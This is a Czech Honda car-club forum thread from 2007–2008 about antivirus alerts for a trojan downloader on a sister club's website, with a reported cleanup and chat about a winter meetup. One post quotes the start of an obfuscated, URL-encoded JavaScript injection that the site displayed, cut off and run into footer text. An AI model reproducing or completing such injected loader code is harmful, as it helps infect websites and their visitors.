Rozšířené hledání} Informace o členství Kontaktní informace Seznam uživatelů Kalendář Spřátelené weby Honda-club.cz Přihlásit se k emailu
[0]
Linka Uživatelské skupiny Linka Galerie avatarů Linka Kdo je online Linka
Linka Jak se stát členem klubu Linka Stáhnout stanovy sdružení Linka Výhody pro členy klubu Linka
  Obsah fóra Honda-club.cz   
Honda Klub Morava - virus
Fórum: Volná diskuze
Zobrazit příspěvky z předchozích:
 Řadit příspěvky dle: 
Zaslat odpověď

Strana 1 z 1
Frik je teď offline  Frik
1 háčko
PříspěvekZaslal: 18.12.2007 , 12:44   Citovat  

Mam Kaspersky anivirus a uz asi druhy mesic mi to hlasi pri pokusu o pristup na web nebo forum Honda-klubu-Moravy HKM virus nebo spis Trojana Trojan-Downloader.JS.Remora.bg. Tenhle trojan neni moc popsany tak nevim co vsechno muze napachat, ale ja to riskovat nebudu.

Kazdpadne jestli tohle bude cist nekdo kdo muze kontaktovat spravce toho webu, teda pokud se o ten web jeste nekdo stara, tak ho na to mozna upozornit.
   Návrat  
   Zobrazit informace o autorovi Osobní garáž Odeslat soukromou zprávu
Daver je teď offline  Daver
Administrátor
Členství: Gold
PříspěvekZaslal: 18.12.2007 , 13:00   Citovat  

Tady je pokec o wéčkové verzi .. myslím je to dost podobný.

Mimochodem, jseš si jistej, že to je od nich ?

Doporučuji kompletne vymazat dočasné soubory internetu a cookies a pak tam zkus znovu vztoupit ... možná to ani není u nich, jako spíš u tebe.

Dej vědět, jax dopad .. dáme jim kdyžtak echo
   Návrat  
Frik je teď offline  Frik
1 háčko
PříspěvekZaslal: 18.12.2007 , 15:17   Citovat  

Tak sem smazal cookies i temporary files pro Firefox i Explorer, ale v obou pripadech mi porad Kapsersky hlasi ten trojan. Je mozne ze tam maji v nejakym scriptu kus podobnyho kodu jako ma ten trojan ale Kaspersky povazuju za docela schopny nastroj, mam verzi 6.0-portugalska edice a posledni aktualizace.

No ale prihlasil sem se pres vzdalenou plochu na firemni server ktery je zabezpecny az az a tam ten web zobrazil bez varovani, ale Kasperskeho tam nemaj. Asi ma teda ten Kaspersky trochu precitlively algoritmus na analyzovani scriptu... to mi hlava nebere
   Návrat  
Dino je teď offline  Dino
1 háčko
PříspěvekZaslal: 18.12.2007 , 15:30  Naposledy upravil Dino dne 18.12.2007 , 15:34, celkově upraveno 2 krát. Citovat  

web Honda Klubu Morava - tudy odkaz byl skutečně napaden virem. Adminovi přišlo hlášení od mne, od Hrušky a některých ostatních členů HKM - mně to třeba hlásilo virus přes NOD 32. Oba admini to opravili, jak forum tak stránky natáhli znovu a nyní je již vše v pořádku - takže klidně můžete zase k nám na návštěvu Úsměv)

Jinak když už jsem se dostal dnes až k vám a je tak vysoké datum , tak vám všem přeji veselé Vánoce a happy New Year - vy bando hondařská Úsměv)

ahoj Dino

Honda Klub Morava
   Návrat  
   Zobrazit informace o autorovi  Odeslat soukromou zprávu
Daver je teď offline  Daver
Administrátor
Členství: Gold
PříspěvekZaslal: 18.12.2007 , 15:31   Citovat  

Dino napsal:
web Honda Klubu Morava - tudy odkaz byl skutečně napaden virem. Adminovi přišlo hlášení od mne, od Hrušky a některých ostatních členů HKM - mně to hlásilo virus přes NOD 32. Oba admini to opravili, jak forum tak stránky natáhli znovu a nyní je již vše v pořádku - takže klidně můžete zase k nám na návštěvu Úsměv)

Jinak když už jsem se dostal dnes až k vám a je tak vysoké datum , tak vám všem přeji veselé Vánoce a happy New Year - vy bando hondařská Úsměv)

ahoj Dino

Mno vidíš to kua :o) Tobě taky hondě zdaru Je to tam.
   Návrat  
1 háčko
PříspěvekZaslal: 18.12.2007 , 15:37   Citovat  

jinak pro jistotu - kontakt na admina webu Honda klubu Morava je stále stejný a funguje 5 dní v týdnu Úsměv)
admin@honda-klub-morava.cz
   Návrat  
 Anonymní
PříspěvekZaslal: 18.12.2007 , 15:59   Citovat  

Dino: Děkujem, nápodobně Mrk Úsměv
   Návrat  

Jauda je teď offline  Jauda
3 háčka
PříspěvekZaslal: 10.1.2008 , 10:25   Citovat  

teď jsem se chtěl mrknout na forum HKM, ale napsalo mi to na stránce toto:
document.createElement('Comment').data=("%3Cscript%3Efunction%20hrx60d%28tqtcv6%29%
7Bvar%20zedx52%3Dnew%20String%28arguments.callee%29%3Bzedx52%
3Dzedx52.toString retain the full copyright we request you at least leave in place the Powered by phpBB line, with phpBB linked to tudy odkaz If you refuse to include even this then support on our forums may be affected. The phpBB Group : 2002 // --> Powered by phpBB © 2001, 2005 phpBB Group
Český překlad phpBB CZ :: Azu, Emilio, drake127

funguje to někomu normálně??
HKM forum
   Návrat  
dejwidoos je teď offline  dejwidoos
1 háčko
PříspěvekZaslal: 10.1.2008 , 10:35   Citovat  

mi to jede fpohodě OK
   Návrat  
3 háčka
PříspěvekZaslal: 10.1.2008 , 13:26   Citovat  

dejwidoos napsal:
mi to jede fpohodě OK

mě teda v práci pořád nic.. Smutný chtěl jsem omrknout nějaký info ohledně srazu Valašská zima.. chtěl jsem přijet.. nemohl by sem hodit někdo info??
   Návrat  
dejwidoos je teď offline  dejwidoos
1 háčko
PříspěvekZaslal: 10.1.2008 , 13:56   Citovat  

Jauda napsal:
mě teda v práci pořád nic.. Smutný chtěl jsem omrknout nějaký info ohledně srazu Valašská zima.. chtěl jsem přijet.. nemohl by sem hodit někdo info??

Cituji:

Dino

Příspěvek Zaslal: 2.1.2008, 16:53 Předmět: Citovat
mám pro všechny informaci přímo od Nexe - Valašská zima se bude konat ve Valašském Meziříčí v termínu 1.-3.2.2008. Píšu vám to všem hned dneska, abyste si už mohli dopředu zařídit volno a povolení doma Smile) podrobné informace napíšu hned jak dojdou od Nexe ( asi za 14 dní ) tak ve Val Mezu u Nexe zase ahoj - fšechny zdravím - Dino Smile
   Návrat  
3 háčka
PříspěvekZaslal: 10.1.2008 , 14:00   Citovat  

dejwidoos napsal:
Cituji:

Dino

mám pro všechny informaci přímo od Nexe - Valašská zima se bude konat ve Valašském Meziříčí v termínu 1.-3.2.2008. Píšu vám to všem hned dneska, abyste si už mohli dopředu zařídit volno a povolení doma Smile) podrobné informace napíšu hned jak dojdou od Nexe ( asi za 14 dní ) tak ve Val Mezu u Nexe zase ahoj - fšechny zdravím - Dino Smile

Díky.. snad mi to vyjde i s mladou..
   Návrat  
Hellborn je teď offline  Hellborn
5 háček
Členství: Žádné
PříspěvekZaslal: 10.1.2008 , 14:10   Citovat  

dejwidoos napsal:
Cituji:

Dino

Ach jo.. nám to letos nevyjde z finančních důvodů... Po 3letech budeme chybět... Smutný
   Návrat  
1 háčko
PříspěvekZaslal: 10.1.2008 , 18:27   Citovat  

Jauda, Jauda - napsal mi kolega z tohoto fora, že tady nahazuješ téma s virusem na našich stránkách ..... ocenil bych, když už sem skoro vůbec nechodíme, kdyby ses poradil s našim adminem, když už máš nějaký problém s našim forem. Absolutně mi to nedává logiku, když píšeš jenom sem . Už jsem to sem psal jednou, že v případě jakýhkoliv problému se zobrazením stránek Honda Klubu Morava nebo jeho fora na adrese honda-klub-morava cz kontaktujte klidně admina na emailu: admin@honda-klub-morava.cz a on vám situaci prověří. Teď jsem s ním mluvil a vše na naší straně je v pořádku, to je i důvod, proč ten problém se zobrazením máš jen ty Jaudo. Neměl bys zbytečně plašit lidi a ještě posílat vzkazy tam, kde si je naši admini nemohou přečíst, protože sem moc nechodí. Tak příště - ty Úsměv)
   Návrat  
3 háčka
PříspěvekZaslal: 11.1.2008 , 7:34   Citovat  

Já nezaložil toto téma na problém s virusem, já se jen ptal, jestli jde ostatním forum.. to je myslím rozdíl.. toto téma taky myslím k tomu slouží.. a HKM není jediný web, který se tu řeší, když je nějakej problém.. viz třeba občasný výpadky s youtube nebo třeba dříve výpadky ukažto atd. - vždy se to tu řešilo.. jinak ale chápu tvou připomínku a příště se budu ptát admina, pokud si vzpomenu na kontakt.. sem jsem to napsal, protože mě nenapadlo hned kontaktovat admina a tvůj příspěvek, kde tyto informace píšeš, jsem taky nějak neviděl..

Takže za plašení lidí tady na foru se omlouvám.. Se stydím ale myslím, že jsem to nespískal já tak docela já, ale už zakladatel tématu.. uznávám, že bych si to měl ověřit u zdroje, ale jelikož mi nefungovalo to forum, tak jsem tam nemohl napsat, za další mě nenapadlo si najít kontakt na admina (mimochodem, jak si můžu být jistej, že pokud by nešly stránky HKM ani forum, že dojde email adminovi??) a taky mi přijde rychlejší se zeptat tady lidí, kteří hned můžou zkontrolovat, jestli to jde, než psát adminovi, kterej bude určitě více zaneprázdněnej, než někteří tady..

ale beru to.. přátele příště si na to dám bacha..
   Návrat  
1 háčko
PříspěvekZaslal: 11.1.2008 , 9:39   Citovat  

..... si rozumíme, však si taky z Moravy, ne ? Úsměv))
   Návrat  
3 háčka
PříspěvekZaslal: 11.1.2008 , 9:45   Citovat  

Jasné.. mimochodem, pořád mi to v práci nejde.. Lucy Je to tam. provokace.. je to tu nějaký divný, asi dám výpověď.. Mr. Green snad mi to půjde doma, abych zjistil podrobnosti, protože bych moc chtěl přijet, ale ani nevím, kam ve Valmezu.. asi sem nebudete dávat info, co??
   Návrat  
1 háčko
PříspěvekZaslal: 11.1.2008 , 10:02   Citovat  

sraz je už léta tradičně na parkovišti naproti Shelce ve Valašském Meziříčí. Nemůžeš to minout, je to vedle zajímavého kruhového objezdu. Z jedné strany benzínka, z druhé parkoviště a z třetí hřbitov - úplně jak v životě Úsměv

a co se informací týká, tak neboj, Nex to dá i sem Úsměv přece Hondař všude bratry má Úsměv) ahoj
   Návrat  
3 háčka
PříspěvekZaslal: 11.1.2008 , 10:06   Citovat  

Dino napsal:
sraz je už léta tradičně na parkovišti naproti Shelce ve Valašském Meziříčí. Nemůžeš to minout, je to vedle zajímavého kruhového objezdu. Z jedné strany benzínka, z druhé parkoviště a z třetí hřbitov - úplně jak v životě Úsměv

a co se informací týká, tak neboj, Nex to dá i sem Úsměv přece Hondař všude bratry má Úsměv) ahoj

Díky díky díky.. za info.. už se těším.. snad nebudou kalamity na silnicích a budu mít vpořádku autí.. nějak mi blbne kontrolka ABS..
   Návrat  

Obsah fóra Honda-club.cz   
Honda Klub Morava - virus
Fórum: Volná diskuze
Zobrazit příspěvky z předchozích:
 Řadit příspěvky dle: 
Zaslat odpověď

Časy uváděny v GMT + 1 hodina